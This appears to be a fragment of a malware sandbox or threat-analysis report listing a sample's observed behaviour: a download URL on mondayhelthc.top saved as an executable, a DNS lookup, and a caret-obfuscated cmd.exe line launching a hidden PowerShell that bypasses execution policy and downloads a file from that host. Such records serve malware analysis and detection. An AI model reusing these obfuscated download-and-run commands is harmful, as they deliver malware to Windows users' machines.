Technical information
- http://mondayhelthc.top/read.php?f=404 as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^ER^sH^ELl.^EXe -^e^x^ecUT^I^o^N^Po^lI^cY^ ^BypAs^s -NOprOF^I^L^E ^-WI^N^do^W^STYl^e^ h^ID^d^en^ (nE^w^-oBJEC^t SYS^t^eM.neT^.^w^E^bCl^I^ENT).D^o^wNLOad^Fi^Le('http://mondayhelthc....
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^ER^sH^ELl.^EXe -^e^x^ecUT^I^o^N^Po^lI^cY^ ^BypAs^s -NOprOF^I^L^E ^-WI^N^do^W^STYl^e^ h^ID^d^en^ (nE^w^-oBJEC^t SYS^t^eM.neT^.^w^E^bCl^I^ENT).D^o^wNLOad^Fi^Le('http://mondayhelthc....' (with hidden window)